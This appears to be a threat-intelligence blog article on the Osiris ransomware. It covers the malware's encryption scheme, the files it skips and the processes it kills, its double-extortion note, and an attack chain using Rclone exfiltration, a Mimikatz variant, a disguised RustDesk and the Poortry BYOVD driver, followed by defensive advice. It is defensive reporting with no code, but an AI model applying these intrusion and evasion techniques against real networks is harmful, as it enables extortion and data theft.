Introducing Osiris: A Sophisticated New Ransomware Threat

Cybersecurity experts continue to warn organizations about the evolving nature of cybercrime. One of the most alarming developments in recent months is the emergence of Osiris, a newly identified ransomware threat that demonstrates sophisticated techniques and operational maturity. First observed in late 2025, this ransomware has already targeted major organizations and shows signs of being operated by highly experienced attackers. The appearance of Osiris ransomware is another reminder that the global ransomware ecosystem continues to evolve rapidly. Attackers constantly refine their methods, combining new malware families with proven tactics such as data exfiltration, remote access tools, and privilege escalation techniques.

What Is Osiris Ransomware?

Osiris is a newly discovered ransomware threat that was identified during an attack targeting a major food service franchise operator in Southeast Asia in November 2025. Security researchers investigating the incident concluded that this malware represents a completely new ransomware family.

Although the name “Osiris” may sound familiar to cybersecurity professionals, it is important to note that this ransomware is not related to the Osiris variant discovered in 2016, which was linked to the Locky ransomware family. The modern Osiris threat appears to have been developed independently and shows distinct functionality and design. At the time of analysis, little is known about the developers behind this ransomware threat.

Researchers have not confirmed whether Osiris operates as a ransomware-as-a-service (RaaS) platform or whether it is controlled by a single threat group. However, evidence suggests that the attackers deploying Osiris may have connections to previous Inc ransomware campaigns. These similarities include shared tools, tactics, and operational behaviors that hint at either collaboration or the involvement of former affiliates of existing ransomware groups.

Read: How Criminals Exploit Prepaid SIM Loopholes

Key Characteristics of the Osiris Ransomware Threat

Like many modern ransomware families, Osiris includes a wide range of malicious functions designed to maximize the damage inflicted on victims. The ransomware is capable of:

• Stopping critical services
• Terminating important processes
• Encrypting files across targeted systems
• Selecting specific folders and file extensions to encrypt
• Dropping a ransom note for victims

These features allow attackers to disrupt business operations while ensuring that valuable files are inaccessible unless the ransom is paid. One of the distinctive aspects of the Osiris ransomware threat is its flexibility through command-line parameters. Attackers can configure the ransomware to perform specific actions during deployment, such as specifying directories to encrypt or enabling partial or full encryption modes. For example, the ransomware supports options that allow operators to:

• Define log file paths
• Target specific files or directories for encryption
• Disable Hyper-V virtual machines
• Skip encryption of selected virtual machines
• Choose between partial or full file encryption

This level of control suggests that Osiris was developed by experienced malware authors who understand the needs of ransomware operators conducting targeted attacks.

Files and Systems Targeted by Osiris

A common strategy used by ransomware developers is to avoid encrypting certain system files that could break the operating system completely. If a system becomes unusable, victims may simply restore backups rather than paying the ransom. The Osiris ransomware threat follows this same strategy. It deliberately skips several file extensions, including:

• .exe
• .dll
• .msi
• .mp4
• .mp3
• .mov
• .avi
• .apk
• .sys

Similarly, it avoids encrypting critical system directories such as:

• Windows
• System Volume Information
• ProgramData
• Documents and Settings
• $Recycle.bin

By avoiding these locations, the ransomware ensures that the system remains functional enough for victims to read the ransom note and communicate with attackers. After encryption, the malware appends the “.Osiris” extension to affected files. For instance, a file named document.txt would become document.txt.Osiris. This extension serves as a clear indicator that files have been compromised by the Osiris ransomware attack.

Advanced Encryption Mechanism

One of the most critical components of any ransomware threat is its encryption mechanism. Osiris uses a hybrid encryption scheme that combines modern cryptographic techniques. The ransomware utilizes:

• ECC (Elliptic Curve Cryptography)
• AES-128-CTR encryption

Each file encrypted by Osiris receives its own unique AES key, making decryption without the attacker’s private key extremely difficult. This approach is commonly used by advanced ransomware families because it balances speed and security. AES encryption allows rapid file processing, while ECC protects the encryption keys from recovery.

Additionally, the ransomware uses a Windows function called completionIOPort to manage asynchronous input/output requests during encryption. This allows the malware to encrypt files efficiently without causing obvious system slowdowns that might alert users.

Process and Service Termination

To maximize the effectiveness of its attack, the Osiris ransomware threat actively terminates processes that might interfere with encryption. Examples of targeted processes include:

• SQL database services
• Microsoft Office applications
• Outlook and email clients
• Backup and synchronization tools
• Cloud storage processes

By stopping these processes, attackers ensure that important files are unlocked and accessible for encryption. In addition to processes, Osiris also stops critical services such as:

• VSS (Volume Shadow Copy Service)
• Microsoft Exchange services
• Backup software services
• Various database services

This tactic prevents victims from easily restoring files using system snapshots or backup tools.

The Ransom Note

Once encryption is complete, the ransomware drops a file named “Osiris-MESSAGE.txt.” This ransom note informs victims that their files have been encrypted and that sensitive data has been stolen. It typically includes a link to a negotiation platform where victims can communicate directly with the attackers to discuss payment.

The attackers also threaten to leak the stolen data if the ransom is not paid, a tactic commonly known as double extortion. This strategy has become a common practice in modern ransomware operations because it significantly increases pressure on victims to comply with the attackers’ ransom demands.

The Attack Chain Behind Osiris

Understanding how Osiris ransomware spreads is essential for organizations that want to prevent similar attacks. Based on investigations, the attack chain observed in the 2025 incident involved multiple stages, beginning with data exfiltration and followed by credential theft, reconnaissance, and remote access.

Data Exfiltration Using Rclone

One of the earliest indicators of the attack was the use of Rclone, a legitimate command-line tool commonly used for transferring files to cloud storage. In this campaign, attackers used Rclone to exfiltrate sensitive data from the victim’s network to a Wasabi cloud storage bucket. This method allows cybercriminals to move large volumes of data efficiently while blending their activity with normal network traffic. Notably, the same tactic had previously been observed in operations linked to the Inc ransomware group, suggesting potential similarities between the campaigns.

Credential Theft Using Mimikatz

Another important tool used during the attack was Mimikatz, a well-known credential harvesting utility widely used by threat actors. In this case, attackers deployed a variant of Mimikatz named kaz.exe, which had also been seen in earlier Inc ransomware incidents. The reuse of the same filename and tool variant strengthens the theory that the operators behind the Osiris ransomware threat may have prior experience with other ransomware operations.

Use of Dual-Use Administrative Tools

The attackers also relied on several legitimate administrative tools such as Netscan, Netexec, and MeshAgent. These tools are commonly used by system administrators for network management but can also be abused by attackers for malicious purposes. In this campaign, they were likely used for reconnaissance, lateral movement within the network, and maintaining persistence on compromised systems. This technique, often referred to as “living off the land,” helps attackers avoid detection because the tools themselves are not inherently malicious.

Modified Remote Access Tools

Another notable aspect of the attack was the use of a modified version of RustDesk, an open-source remote desktop application. The attackers altered the software to disguise its real purpose by configuring it to appear as “WinZip Remote Desktop” and assigning it the WinZip application icon. This type of camouflage helps the malicious tool appear legitimate to users and security systems, allowing attackers to maintain remote access without immediately raising suspicion.

These combined techniques demonstrate that the operators behind the Osiris ransomware threat relied on a carefully coordinated attack chain, leveraging both legitimate tools and modified software to infiltrate networks and prepare systems for ransomware deployment.

The Role of the Poortry Driver

One of the most sophisticated elements of the Osiris ransomware threat is the use of a malicious driver called Poortry, also known as Abyssworker. This driver played a critical role in weakening security defenses during the attack. It was deployed as part of a Bring Your Own Vulnerable Driver (BYOVD) attack, a technique increasingly used by ransomware operators to bypass modern security protections.

In BYOVD attacks, cybercriminals load vulnerable or malicious drivers onto a system to gain kernel-level access, which allows them to disable security software and bypass defensive mechanisms. Poortry is particularly unusual because it appears to be a custom driver that attackers managed to get digitally signed, which makes it more difficult for security tools to detect. Once deployed, the driver can terminate security processes and disable protective software, making it extremely valuable for ransomware operators preparing the environment for encryption.

Additional Tools Used in the Attack

In addition to the Poortry driver, the attackers behind the Osiris ransomware threat deployed several other tools to maintain control over the compromised network and disrupt defensive mechanisms. These tools helped them strengthen their foothold and ensure that security solutions could not easily stop the attack.

• KillAV
• Remote Desktop Protocol (RDP)

These tools allowed the attackers to terminate antivirus processes and maintain remote access to the compromised environment. Their use demonstrates that the operation was carefully planned and executed with multiple layers of attack techniques.

Possible Links to Other Ransomware Groups

Although researchers have not definitively linked Osiris ransomware to a specific threat group, several indicators suggest that the attackers may have connections to previously active ransomware operators. The overlap in tactics and tools raises the possibility that experienced affiliates from other ransomware campaigns are involved. Indicators suggesting potential links include:

• Data exfiltration to Wasabi cloud storage
• Use of the kaz.exe version of Mimikatz
• Overlaps with tactics used by Inc ransomware attackers

Additionally, the Poortry driver has previously been observed in attacks associated with the Medusa ransomware group. However, since Poortry is not exclusive to a single threat actor, its presence alone does not confirm attribution. Instead, it highlights how ransomware operators frequently share tools and techniques across the cybercriminal ecosystem.

Why the Osiris Ransomware Threat Matters

The emergence of Osiris highlights several important trends in the evolving ransomware landscape. As cybercriminal groups continue to refine their methods, ransomware attacks are becoming increasingly complex and difficult to detect.

Modern ransomware campaigns often combine data theft, privilege escalation, and advanced encryption techniques to maximize their impact. In addition, the ransomware ecosystem is highly dynamic, with new malware families appearing frequently and often being developed by attackers who previously worked with other ransomware groups.

These attacks are rarely simple malware infections. Instead, they are usually multi-stage operations involving reconnaissance, lateral movement, and data exfiltration before encryption occurs. As a result, organizations that fail to detect early warning signs may only discover the intrusion when ransomware is finally deployed.

How Organizations Can Protect Themselves

Given the growing sophistication of threats like Osiris ransomware, organizations must adopt a proactive and layered cybersecurity strategy. Preventing ransomware attacks requires a combination of strong technical defenses, monitoring capabilities, and employee awareness. Key defensive measures include:

1. Implementing strong endpoint detection and response solutions
2. Monitoring unusual data transfers to cloud storage services
3. Restricting the use of remote administration tools
4. Regularly patching systems and drivers
5. Limiting RDP access to trusted networks

In addition to these measures, organizations should maintain reliable offline backups so critical data can be restored without paying a ransom. Regular cybersecurity awareness training is also essential, as many ransomware attacks begin with phishing emails or credential compromise that provide attackers with their initial access point.

Read: How to Stay Safe from MIMICRAT Infections

Conclusion

The discovery of Osiris highlights the evolving nature of modern ransomware threats. With advanced encryption, defense evasion techniques, and a complex attack chain, Osiris demonstrates the capabilities of experienced cybercriminals. As ransomware continues to grow more sophisticated, organizations must strengthen their cybersecurity defenses and stay vigilant to detect threats early and reduce the risk of serious data loss.